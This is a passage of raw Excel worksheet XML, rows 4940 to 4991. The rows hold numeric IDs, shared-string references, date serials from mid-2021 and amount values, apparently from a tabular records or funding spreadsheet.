      <c r="F4940" t="s">
        <v>14089</v>
      </c>
      <c r="G4940" s="1">
        <v>44347</v>
      </c>
      <c r="H4940">
        <v>50000</v>
      </c>
      <c r="I4940" t="s">
        <v>13739</v>
      </c>
    </row>
    <row r="4941" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4941">
        <v>25867</v>
      </c>
      <c r="B4941">
        <v>5766</v>
      </c>
      <c r="C4941" t="s">
        <v>7347</v>
      </c>
      <c r="D4941" t="s">
        <v>14088</v>
      </c>
      <c r="E4941">
        <v>12</v>
      </c>
      <c r="F4941" t="s">
        <v>14090</v>
      </c>
      <c r="G4941" s="1">
        <v>44347</v>
      </c>
      <c r="H4941">
        <v>45000</v>
      </c>
      <c r="I4941" t="s">
        <v>13485</v>
      </c>
    </row>
    <row r="4942" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4942">
        <v>25868</v>
      </c>
      <c r="B4942">
        <v>5766</v>
      </c>
      <c r="C4942" t="s">
        <v>7347</v>
      </c>
      <c r="D4942" t="s">
        <v>14088</v>
      </c>
      <c r="E4942">
        <v>12</v>
      </c>
      <c r="F4942" t="s">
        <v>9437</v>
      </c>
      <c r="G4942" s="1">
        <v>44347</v>
      </c>
      <c r="H4942">
        <v>50000</v>
      </c>
      <c r="I4942" t="s">
        <v>13485</v>
      </c>
    </row>
    <row r="4943" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4943">
        <v>25869</v>
      </c>
      <c r="B4943">
        <v>5766</v>
      </c>
      <c r="C4943" t="s">
        <v>7347</v>
      </c>
      <c r="D4943" t="s">
        <v>14088</v>
      </c>
      <c r="E4943">
        <v>12</v>
      </c>
      <c r="F4943" t="s">
        <v>8913</v>
      </c>
      <c r="G4943" s="1">
        <v>44347</v>
      </c>
      <c r="H4943">
        <v>40000</v>
      </c>
      <c r="I4943" t="s">
        <v>13485</v>
      </c>
    </row>
    <row r="4944" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4944">
        <v>25891</v>
      </c>
      <c r="B4944">
        <v>2538</v>
      </c>
      <c r="C4944" t="s">
        <v>4142</v>
      </c>
      <c r="D4944" t="s">
        <v>14091</v>
      </c>
      <c r="E4944">
        <v>2</v>
      </c>
      <c r="F4944" t="s">
        <v>14092</v>
      </c>
      <c r="G4944" s="1">
        <v>44370</v>
      </c>
      <c r="H4944">
        <v>200000</v>
      </c>
      <c r="I4944" t="s">
        <v>9603</v>
      </c>
    </row>
    <row r="4945" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4945">
        <v>25893</v>
      </c>
      <c r="B4945">
        <v>1823</v>
      </c>
      <c r="C4945" t="s">
        <v>4956</v>
      </c>
      <c r="D4945" t="s">
        <v>14093</v>
      </c>
      <c r="E4945">
        <v>26</v>
      </c>
      <c r="F4945" t="s">
        <v>9437</v>
      </c>
      <c r="G4945" s="1">
        <v>44382</v>
      </c>
      <c r="H4945">
        <v>300000</v>
      </c>
      <c r="I4945" t="s">
        <v>9485</v>
      </c>
      <c r="J4945" t="s">
        <v>14094</v>
      </c>
    </row>
    <row r="4946" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4946">
        <v>25894</v>
      </c>
      <c r="B4946">
        <v>1823</v>
      </c>
      <c r="C4946" t="s">
        <v>4956</v>
      </c>
      <c r="D4946" t="s">
        <v>14093</v>
      </c>
      <c r="E4946">
        <v>26</v>
      </c>
      <c r="F4946" t="s">
        <v>14095</v>
      </c>
      <c r="G4946" s="1">
        <v>44382</v>
      </c>
      <c r="H4946">
        <v>2300</v>
      </c>
      <c r="J4946" t="s">
        <v>14094</v>
      </c>
    </row>
    <row r="4947" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4947">
        <v>25895</v>
      </c>
      <c r="B4947">
        <v>1823</v>
      </c>
      <c r="C4947" t="s">
        <v>4956</v>
      </c>
      <c r="D4947" t="s">
        <v>14093</v>
      </c>
      <c r="E4947">
        <v>26</v>
      </c>
      <c r="F4947" t="s">
        <v>14096</v>
      </c>
      <c r="G4947" s="1">
        <v>44382</v>
      </c>
      <c r="H4947">
        <v>7500</v>
      </c>
      <c r="J4947" t="s">
        <v>14094</v>
      </c>
    </row>
    <row r="4948" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4948">
        <v>25896</v>
      </c>
      <c r="B4948">
        <v>1823</v>
      </c>
      <c r="C4948" t="s">
        <v>4956</v>
      </c>
      <c r="D4948" t="s">
        <v>14093</v>
      </c>
      <c r="E4948">
        <v>26</v>
      </c>
      <c r="F4948" t="s">
        <v>14097</v>
      </c>
      <c r="G4948" s="1">
        <v>44382</v>
      </c>
      <c r="H4948">
        <v>750</v>
      </c>
      <c r="J4948" t="s">
        <v>14094</v>
      </c>
    </row>
    <row r="4949" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4949">
        <v>25897</v>
      </c>
      <c r="B4949">
        <v>1823</v>
      </c>
      <c r="C4949" t="s">
        <v>4956</v>
      </c>
      <c r="D4949" t="s">
        <v>14093</v>
      </c>
      <c r="E4949">
        <v>26</v>
      </c>
      <c r="F4949" t="s">
        <v>14098</v>
      </c>
      <c r="G4949" s="1">
        <v>44382</v>
      </c>
      <c r="H4949">
        <v>9000</v>
      </c>
      <c r="J4949" t="s">
        <v>14094</v>
      </c>
    </row>
    <row r="4950" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4950">
        <v>25898</v>
      </c>
      <c r="B4950">
        <v>1823</v>
      </c>
      <c r="C4950" t="s">
        <v>4956</v>
      </c>
      <c r="D4950" t="s">
        <v>14093</v>
      </c>
      <c r="E4950">
        <v>26</v>
      </c>
      <c r="F4950" t="s">
        <v>9673</v>
      </c>
      <c r="G4950" s="1">
        <v>44382</v>
      </c>
      <c r="H4950">
        <v>7500</v>
      </c>
      <c r="I4950" t="s">
        <v>14099</v>
      </c>
      <c r="J4950" t="s">
        <v>14094</v>
      </c>
    </row>
    <row r="4951" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4951">
        <v>25899</v>
      </c>
      <c r="B4951">
        <v>1823</v>
      </c>
      <c r="C4951" t="s">
        <v>4956</v>
      </c>
      <c r="D4951" t="s">
        <v>14093</v>
      </c>
      <c r="E4951">
        <v>26</v>
      </c>
      <c r="F4951" t="s">
        <v>609</v>
      </c>
      <c r="G4951" s="1">
        <v>44382</v>
      </c>
      <c r="H4951">
        <v>25000</v>
      </c>
      <c r="I4951" t="s">
        <v>14099</v>
      </c>
      <c r="J4951" t="s">
        <v>14094</v>
      </c>
    </row>
    <row r="4952" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4952">
        <v>25900</v>
      </c>
      <c r="B4952">
        <v>1823</v>
      </c>
      <c r="C4952" t="s">
        <v>4956</v>
      </c>
      <c r="D4952" t="s">
        <v>14093</v>
      </c>
      <c r="E4952">
        <v>26</v>
      </c>
      <c r="F4952" t="s">
        <v>4686</v>
      </c>
      <c r="G4952" s="1">
        <v>44382</v>
      </c>
      <c r="H4952">
        <v>50</v>
      </c>
      <c r="I4952" t="s">
        <v>9522</v>
      </c>
      <c r="J4952" t="s">
        <v>14094</v>
      </c>
    </row>
    <row r="4953" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4953">
        <v>25901</v>
      </c>
      <c r="B4953">
        <v>1823</v>
      </c>
      <c r="C4953" t="s">
        <v>4956</v>
      </c>
      <c r="D4953" t="s">
        <v>14093</v>
      </c>
      <c r="E4953">
        <v>26</v>
      </c>
      <c r="F4953" t="s">
        <v>2236</v>
      </c>
      <c r="G4953" s="1">
        <v>44382</v>
      </c>
      <c r="H4953">
        <v>50</v>
      </c>
      <c r="I4953" t="s">
        <v>9522</v>
      </c>
      <c r="J4953" t="s">
        <v>14094</v>
      </c>
    </row>
    <row r="4954" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4954">
        <v>25903</v>
      </c>
      <c r="B4954">
        <v>1848</v>
      </c>
      <c r="C4954" t="s">
        <v>6675</v>
      </c>
      <c r="D4954" t="s">
        <v>14100</v>
      </c>
      <c r="E4954">
        <v>17</v>
      </c>
      <c r="F4954" t="s">
        <v>9454</v>
      </c>
      <c r="G4954" s="1">
        <v>44369</v>
      </c>
      <c r="H4954">
        <v>10000</v>
      </c>
      <c r="J4954" t="s">
        <v>14101</v>
      </c>
    </row>
    <row r="4955" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4955">
        <v>25904</v>
      </c>
      <c r="B4955">
        <v>1848</v>
      </c>
      <c r="C4955" t="s">
        <v>6675</v>
      </c>
      <c r="D4955" t="s">
        <v>14100</v>
      </c>
      <c r="E4955">
        <v>17</v>
      </c>
      <c r="F4955" t="s">
        <v>512</v>
      </c>
      <c r="G4955" s="1">
        <v>44369</v>
      </c>
      <c r="H4955">
        <v>10000</v>
      </c>
      <c r="J4955" t="s">
        <v>14102</v>
      </c>
    </row>
    <row r="4956" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4956">
        <v>25905</v>
      </c>
      <c r="B4956">
        <v>1848</v>
      </c>
      <c r="C4956" t="s">
        <v>6675</v>
      </c>
      <c r="D4956" t="s">
        <v>14103</v>
      </c>
      <c r="E4956">
        <v>17</v>
      </c>
      <c r="F4956" t="s">
        <v>9217</v>
      </c>
      <c r="G4956" s="1">
        <v>44369</v>
      </c>
      <c r="H4956">
        <v>10000</v>
      </c>
      <c r="J4956" t="s">
        <v>14104</v>
      </c>
    </row>
    <row r="4957" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4957">
        <v>25906</v>
      </c>
      <c r="B4957">
        <v>1848</v>
      </c>
      <c r="C4957" t="s">
        <v>6675</v>
      </c>
      <c r="D4957" t="s">
        <v>14100</v>
      </c>
      <c r="E4957">
        <v>17</v>
      </c>
      <c r="F4957" t="s">
        <v>5434</v>
      </c>
      <c r="G4957" s="1">
        <v>44369</v>
      </c>
      <c r="H4957">
        <v>10000</v>
      </c>
      <c r="J4957" t="s">
        <v>14105</v>
      </c>
    </row>
    <row r="4958" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4958">
        <v>25907</v>
      </c>
      <c r="B4958">
        <v>1848</v>
      </c>
      <c r="C4958" t="s">
        <v>6675</v>
      </c>
      <c r="D4958" t="s">
        <v>14100</v>
      </c>
      <c r="E4958">
        <v>17</v>
      </c>
      <c r="F4958" t="s">
        <v>14106</v>
      </c>
      <c r="G4958" s="1">
        <v>44369</v>
      </c>
      <c r="H4958">
        <v>10000</v>
      </c>
      <c r="J4958" t="s">
        <v>14105</v>
      </c>
    </row>
    <row r="4959" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4959">
        <v>25908</v>
      </c>
      <c r="B4959">
        <v>1848</v>
      </c>
      <c r="C4959" t="s">
        <v>6675</v>
      </c>
      <c r="D4959" t="s">
        <v>14100</v>
      </c>
      <c r="E4959">
        <v>17</v>
      </c>
      <c r="F4959" t="s">
        <v>14107</v>
      </c>
      <c r="G4959" s="1">
        <v>44369</v>
      </c>
      <c r="H4959">
        <v>10000</v>
      </c>
      <c r="J4959" t="s">
        <v>14108</v>
      </c>
    </row>
    <row r="4960" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4960">
        <v>25909</v>
      </c>
      <c r="B4960">
        <v>1848</v>
      </c>
      <c r="C4960" t="s">
        <v>6675</v>
      </c>
      <c r="D4960" t="s">
        <v>14100</v>
      </c>
      <c r="E4960">
        <v>17</v>
      </c>
      <c r="F4960" t="s">
        <v>9466</v>
      </c>
      <c r="G4960" s="1">
        <v>44369</v>
      </c>
      <c r="H4960">
        <v>10000</v>
      </c>
      <c r="J4960" t="s">
        <v>14105</v>
      </c>
    </row>
    <row r="4961" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4961">
        <v>25910</v>
      </c>
      <c r="B4961">
        <v>1848</v>
      </c>
      <c r="C4961" t="s">
        <v>6675</v>
      </c>
      <c r="D4961" t="s">
        <v>14100</v>
      </c>
      <c r="E4961">
        <v>17</v>
      </c>
      <c r="F4961" t="s">
        <v>9483</v>
      </c>
      <c r="G4961" s="1">
        <v>44369</v>
      </c>
      <c r="H4961">
        <v>10000</v>
      </c>
      <c r="J4961" t="s">
        <v>14109</v>
      </c>
    </row>
    <row r="4962" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4962">
        <v>25911</v>
      </c>
      <c r="B4962">
        <v>5734</v>
      </c>
      <c r="C4962" t="s">
        <v>9300</v>
      </c>
      <c r="D4962" t="s">
        <v>14110</v>
      </c>
      <c r="E4962">
        <v>33</v>
      </c>
      <c r="F4962" t="s">
        <v>9217</v>
      </c>
      <c r="G4962" s="1">
        <v>44358</v>
      </c>
      <c r="H4962">
        <v>8000</v>
      </c>
      <c r="I4962" t="s">
        <v>10323</v>
      </c>
    </row>
    <row r="4963" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4963">
        <v>25913</v>
      </c>
      <c r="B4963">
        <v>379</v>
      </c>
      <c r="C4963" t="s">
        <v>890</v>
      </c>
      <c r="D4963" t="s">
        <v>14033</v>
      </c>
      <c r="E4963">
        <v>12</v>
      </c>
      <c r="F4963" t="s">
        <v>14111</v>
      </c>
      <c r="G4963" s="1">
        <v>44357</v>
      </c>
      <c r="H4963">
        <v>50000</v>
      </c>
      <c r="I4963" t="s">
        <v>10442</v>
      </c>
      <c r="J4963" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4964" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4964">
        <v>25922</v>
      </c>
      <c r="B4964">
        <v>5774</v>
      </c>
      <c r="C4964" t="s">
        <v>9323</v>
      </c>
      <c r="D4964" t="s">
        <v>14112</v>
      </c>
      <c r="E4964">
        <v>26</v>
      </c>
      <c r="F4964" t="s">
        <v>9651</v>
      </c>
      <c r="G4964" s="1">
        <v>44369</v>
      </c>
      <c r="H4964">
        <v>1200000</v>
      </c>
      <c r="I4964" t="s">
        <v>9536</v>
      </c>
      <c r="J4964" t="s">
        <v>14113</v>
      </c>
    </row>
    <row r="4965" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4965">
        <v>25923</v>
      </c>
      <c r="B4965">
        <v>5481</v>
      </c>
      <c r="C4965" t="s">
        <v>8927</v>
      </c>
      <c r="D4965" t="s">
        <v>14114</v>
      </c>
      <c r="E4965">
        <v>2</v>
      </c>
      <c r="F4965" t="s">
        <v>14115</v>
      </c>
      <c r="G4965" s="1">
        <v>44378</v>
      </c>
      <c r="H4965">
        <v>5000</v>
      </c>
      <c r="I4965" t="s">
        <v>14116</v>
      </c>
    </row>
    <row r="4966" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4966">
        <v>25924</v>
      </c>
      <c r="B4966">
        <v>5755</v>
      </c>
      <c r="C4966" t="s">
        <v>9306</v>
      </c>
      <c r="D4966" t="s">
        <v>14117</v>
      </c>
      <c r="E4966">
        <v>18</v>
      </c>
      <c r="F4966" t="s">
        <v>364</v>
      </c>
      <c r="G4966" s="1">
        <v>44375</v>
      </c>
      <c r="H4966">
        <v>300000</v>
      </c>
      <c r="I4966" t="s">
        <v>9536</v>
      </c>
      <c r="J4966" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4967" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4967">
        <v>25926</v>
      </c>
      <c r="B4967">
        <v>379</v>
      </c>
      <c r="C4967" t="s">
        <v>890</v>
      </c>
      <c r="D4967" t="s">
        <v>14033</v>
      </c>
      <c r="E4967">
        <v>12</v>
      </c>
      <c r="F4967" t="s">
        <v>11092</v>
      </c>
      <c r="G4967" s="1">
        <v>44357</v>
      </c>
      <c r="H4967">
        <v>50000</v>
      </c>
      <c r="I4967" t="s">
        <v>9550</v>
      </c>
      <c r="J4967" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4968" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4968">
        <v>25927</v>
      </c>
      <c r="B4968">
        <v>379</v>
      </c>
      <c r="C4968" t="s">
        <v>890</v>
      </c>
      <c r="D4968" t="s">
        <v>14033</v>
      </c>
      <c r="E4968">
        <v>12</v>
      </c>
      <c r="F4968" t="s">
        <v>4686</v>
      </c>
      <c r="G4968" s="1">
        <v>44357</v>
      </c>
      <c r="H4968">
        <v>50000</v>
      </c>
      <c r="I4968" t="s">
        <v>9550</v>
      </c>
      <c r="J4968" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4969" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4969">
        <v>25931</v>
      </c>
      <c r="B4969">
        <v>5754</v>
      </c>
      <c r="C4969" t="s">
        <v>9332</v>
      </c>
      <c r="D4969" t="s">
        <v>14118</v>
      </c>
      <c r="E4969">
        <v>33</v>
      </c>
      <c r="F4969" t="s">
        <v>9217</v>
      </c>
      <c r="G4969" s="1">
        <v>44356</v>
      </c>
      <c r="H4969">
        <v>7000</v>
      </c>
      <c r="I4969" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="4970" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4970">
        <v>25932</v>
      </c>
      <c r="B4970">
        <v>1776</v>
      </c>
      <c r="C4970" t="s">
        <v>6691</v>
      </c>
      <c r="D4970" t="s">
        <v>14119</v>
      </c>
      <c r="E4970">
        <v>14</v>
      </c>
      <c r="F4970" t="s">
        <v>14120</v>
      </c>
      <c r="G4970" s="1">
        <v>44378</v>
      </c>
      <c r="H4970">
        <v>1500000</v>
      </c>
      <c r="J4970" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4971" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4971">
        <v>25933</v>
      </c>
      <c r="B4971">
        <v>1776</v>
      </c>
      <c r="C4971" t="s">
        <v>6691</v>
      </c>
      <c r="D4971" t="s">
        <v>14119</v>
      </c>
      <c r="E4971">
        <v>14</v>
      </c>
      <c r="F4971" t="s">
        <v>9470</v>
      </c>
      <c r="G4971" s="1">
        <v>44378</v>
      </c>
      <c r="H4971">
        <v>30000</v>
      </c>
      <c r="J4971" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4972" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4972">
        <v>25934</v>
      </c>
      <c r="B4972">
        <v>1776</v>
      </c>
      <c r="C4972" t="s">
        <v>6691</v>
      </c>
      <c r="D4972" t="s">
        <v>14119</v>
      </c>
      <c r="E4972">
        <v>14</v>
      </c>
      <c r="F4972" t="s">
        <v>9437</v>
      </c>
      <c r="G4972" s="1">
        <v>44378</v>
      </c>
      <c r="H4972">
        <v>500000</v>
      </c>
      <c r="J4972" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4973" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4973">
        <v>25935</v>
      </c>
      <c r="B4973">
        <v>1776</v>
      </c>
      <c r="C4973" t="s">
        <v>6691</v>
      </c>
      <c r="D4973" t="s">
        <v>14119</v>
      </c>
      <c r="E4973">
        <v>14</v>
      </c>
      <c r="F4973" t="s">
        <v>1746</v>
      </c>
      <c r="G4973" s="1">
        <v>44378</v>
      </c>
      <c r="H4973">
        <v>3000</v>
      </c>
      <c r="J4973" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4974" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4974">
        <v>25936</v>
      </c>
      <c r="B4974">
        <v>1776</v>
      </c>
      <c r="C4974" t="s">
        <v>6691</v>
      </c>
      <c r="D4974" t="s">
        <v>14119</v>
      </c>
      <c r="E4974">
        <v>14</v>
      </c>
      <c r="F4974" t="s">
        <v>9941</v>
      </c>
      <c r="G4974" s="1">
        <v>44378</v>
      </c>
      <c r="H4974">
        <v>1000</v>
      </c>
      <c r="J4974" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4975" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4975">
        <v>25937</v>
      </c>
      <c r="B4975">
        <v>1776</v>
      </c>
      <c r="C4975" t="s">
        <v>6691</v>
      </c>
      <c r="D4975" t="s">
        <v>14119</v>
      </c>
      <c r="E4975">
        <v>14</v>
      </c>
      <c r="F4975" t="s">
        <v>9523</v>
      </c>
      <c r="G4975" s="1">
        <v>44378</v>
      </c>
      <c r="H4975">
        <v>5000</v>
      </c>
      <c r="J4975" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4976" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4976">
        <v>25938</v>
      </c>
      <c r="B4976">
        <v>1776</v>
      </c>
      <c r="C4976" t="s">
        <v>6691</v>
      </c>
      <c r="D4976" t="s">
        <v>14119</v>
      </c>
      <c r="E4976">
        <v>14</v>
      </c>
      <c r="F4976" t="s">
        <v>9459</v>
      </c>
      <c r="G4976" s="1">
        <v>44378</v>
      </c>
      <c r="H4976">
        <v>200</v>
      </c>
      <c r="J4976" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4977" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4977">
        <v>25939</v>
      </c>
      <c r="B4977">
        <v>1776</v>
      </c>
      <c r="C4977" t="s">
        <v>6691</v>
      </c>
      <c r="D4977" t="s">
        <v>14119</v>
      </c>
      <c r="E4977">
        <v>14</v>
      </c>
      <c r="F4977" t="s">
        <v>9722</v>
      </c>
      <c r="G4977" s="1">
        <v>44378</v>
      </c>
      <c r="H4977">
        <v>500</v>
      </c>
      <c r="J4977" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4978" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4978">
        <v>25941</v>
      </c>
      <c r="B4978">
        <v>2202</v>
      </c>
      <c r="C4978" t="s">
        <v>6697</v>
      </c>
      <c r="D4978" t="s">
        <v>14121</v>
      </c>
      <c r="E4978">
        <v>33</v>
      </c>
      <c r="F4978" t="s">
        <v>10463</v>
      </c>
      <c r="G4978" s="1">
        <v>44358</v>
      </c>
      <c r="H4978">
        <v>70000</v>
      </c>
      <c r="I4978" t="s">
        <v>9693</v>
      </c>
      <c r="J4978" t="s">
        <v>9934</v>
      </c>
    </row>
    <row r="4979" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4979">
        <v>25942</v>
      </c>
      <c r="B4979">
        <v>2202</v>
      </c>
      <c r="C4979" t="s">
        <v>6697</v>
      </c>
      <c r="D4979" t="s">
        <v>14121</v>
      </c>
      <c r="E4979">
        <v>33</v>
      </c>
      <c r="F4979" t="s">
        <v>13636</v>
      </c>
      <c r="G4979" s="1">
        <v>44358</v>
      </c>
      <c r="H4979">
        <v>100000</v>
      </c>
      <c r="I4979" t="s">
        <v>9550</v>
      </c>
      <c r="J4979" t="s">
        <v>13970</v>
      </c>
    </row>
    <row r="4980" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4980">
        <v>25943</v>
      </c>
      <c r="B4980">
        <v>2202</v>
      </c>
      <c r="C4980" t="s">
        <v>6697</v>
      </c>
      <c r="D4980" t="s">
        <v>14121</v>
      </c>
      <c r="E4980">
        <v>33</v>
      </c>
      <c r="F4980" t="s">
        <v>14122</v>
      </c>
      <c r="G4980" s="1">
        <v>44358</v>
      </c>
      <c r="H4980">
        <v>100000</v>
      </c>
      <c r="I4980" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4981" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4981">
        <v>25944</v>
      </c>
      <c r="B4981">
        <v>2202</v>
      </c>
      <c r="C4981" t="s">
        <v>6697</v>
      </c>
      <c r="D4981" t="s">
        <v>14121</v>
      </c>
      <c r="E4981">
        <v>33</v>
      </c>
      <c r="F4981" t="s">
        <v>2236</v>
      </c>
      <c r="G4981" s="1">
        <v>44358</v>
      </c>
      <c r="H4981">
        <v>100000</v>
      </c>
      <c r="I4981" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="4982" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4982">
        <v>25945</v>
      </c>
      <c r="B4982">
        <v>2202</v>
      </c>
      <c r="C4982" t="s">
        <v>6697</v>
      </c>
      <c r="D4982" t="s">
        <v>14121</v>
      </c>
      <c r="E4982">
        <v>33</v>
      </c>
      <c r="F4982" t="s">
        <v>3763</v>
      </c>
      <c r="G4982" s="1">
        <v>44358</v>
      </c>
      <c r="H4982">
        <v>100000</v>
      </c>
      <c r="I4982" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="4983" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4983">
        <v>25953</v>
      </c>
      <c r="B4983">
        <v>5714</v>
      </c>
      <c r="C4983" t="s">
        <v>9345</v>
      </c>
      <c r="D4983" t="s">
        <v>14123</v>
      </c>
      <c r="E4983">
        <v>23</v>
      </c>
      <c r="F4983" t="s">
        <v>3814</v>
      </c>
      <c r="G4983" s="1">
        <v>44363</v>
      </c>
      <c r="H4983">
        <v>18000</v>
      </c>
      <c r="I4983" t="s">
        <v>14124</v>
      </c>
      <c r="J4983" t="s">
        <v>10285</v>
      </c>
    </row>
    <row r="4984" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4984">
        <v>25954</v>
      </c>
      <c r="B4984">
        <v>5714</v>
      </c>
      <c r="C4984" t="s">
        <v>9345</v>
      </c>
      <c r="D4984" t="s">
        <v>14123</v>
      </c>
      <c r="E4984">
        <v>23</v>
      </c>
      <c r="F4984" t="s">
        <v>12383</v>
      </c>
      <c r="G4984" s="1">
        <v>44363</v>
      </c>
      <c r="H4984">
        <v>1000</v>
      </c>
      <c r="I4984" t="s">
        <v>14124</v>
      </c>
      <c r="J4984" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4985" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4985">
        <v>25955</v>
      </c>
      <c r="B4985">
        <v>5714</v>
      </c>
      <c r="C4985" t="s">
        <v>9345</v>
      </c>
      <c r="D4985" t="s">
        <v>14123</v>
      </c>
      <c r="E4985">
        <v>23</v>
      </c>
      <c r="F4985" t="s">
        <v>9590</v>
      </c>
      <c r="G4985" s="1">
        <v>44363</v>
      </c>
      <c r="H4985">
        <v>1000</v>
      </c>
      <c r="I4985" t="s">
        <v>14124</v>
      </c>
      <c r="J4985" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4986" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4986">
        <v>25957</v>
      </c>
      <c r="B4986">
        <v>5714</v>
      </c>
      <c r="C4986" t="s">
        <v>9345</v>
      </c>
      <c r="D4986" t="s">
        <v>14123</v>
      </c>
      <c r="E4986">
        <v>23</v>
      </c>
      <c r="F4986" t="s">
        <v>1746</v>
      </c>
      <c r="G4986" s="1">
        <v>44363</v>
      </c>
      <c r="H4986">
        <v>15000</v>
      </c>
      <c r="I4986" t="s">
        <v>9952</v>
      </c>
      <c r="J4986" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4987" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4987">
        <v>25996</v>
      </c>
      <c r="B4987">
        <v>5799</v>
      </c>
      <c r="C4987" t="s">
        <v>9351</v>
      </c>
      <c r="D4987" t="s">
        <v>14125</v>
      </c>
      <c r="E4987">
        <v>32</v>
      </c>
      <c r="F4987" t="s">
        <v>11886</v>
      </c>
      <c r="G4987" s="1">
        <v>44358</v>
      </c>
      <c r="H4987">
        <v>30000</v>
      </c>
      <c r="I4987" t="s">
        <v>14126</v>
      </c>
      <c r="J4987" t="s">
        <v>14127</v>
      </c>
    </row>
    <row r="4988" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4988">
        <v>25997</v>
      </c>
      <c r="B4988">
        <v>5799</v>
      </c>
      <c r="C4988" t="s">
        <v>9351</v>
      </c>
      <c r="D4988" t="s">
        <v>14128</v>
      </c>
      <c r="E4988">
        <v>32</v>
      </c>
      <c r="F4988" t="s">
        <v>14129</v>
      </c>
      <c r="G4988" s="1">
        <v>44358</v>
      </c>
      <c r="H4988">
        <v>20000</v>
      </c>
      <c r="I4988" t="s">
        <v>14126</v>
      </c>
      <c r="J4988" t="s">
        <v>14127</v>
      </c>
    </row>
    <row r="4989" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4989">
        <v>25998</v>
      </c>
      <c r="B4989">
        <v>5799</v>
      </c>
      <c r="C4989" t="s">
        <v>9351</v>
      </c>
      <c r="D4989" t="s">
        <v>14125</v>
      </c>
      <c r="E4989">
        <v>32</v>
      </c>
      <c r="F4989" t="s">
        <v>12163</v>
      </c>
      <c r="G4989" s="1">
        <v>44358</v>
      </c>
      <c r="H4989">
        <v>300000</v>
      </c>
      <c r="I4989" t="s">
        <v>14126</v>
      </c>
      <c r="J4989" t="s">
        <v>14127</v>
      </c>
    </row>
    <row r="4990" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4990">
        <v>25999</v>
      </c>
      <c r="B4990">
        <v>5799</v>
      </c>
      <c r="C4990" t="s">
        <v>9351</v>
      </c>
      <c r="D4990" t="s">
        <v>14125</v>
      </c>
      <c r="E4990">
        <v>32</v>
      </c>
      <c r="F4990" t="s">
        <v>14130</v>
      </c>
      <c r="G4990" s="1">
        <v>44358</v>
      </c>
      <c r="H4990">
        <v>300000</v>
      </c>
      <c r="I4990" t="s">
        <v>14126</v>
      </c>
      <c r="J4990" t="s">
        <v>14127</v>
      </c>
    </row>
    <row r="4991" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4991">
        <v>26000</v>
      </c>
      <c r="B4991">
        <v>5799</v>
      </c>
      <c r="C4991" t="s">
        <v>9351</v>
      </c>
      <c r="D4991" t="s">
        <v>14125</v>
      </c>
      <c r="E4991">
        <v>32</v>
      </c>
      <c r="F4991" t="s">
        <v>2236</v>
      </c>
      <c r="G4991" s="1">
        <v>44358</v>
      </c>
      <c r="H4991">
        <v>300000</v>
      </c>
      <c r="I4991" t="s">
        <v>14126</v>
      </c>
      <c r="J4991" t="s">
        <v>14127</v>
      </c>
    </row>
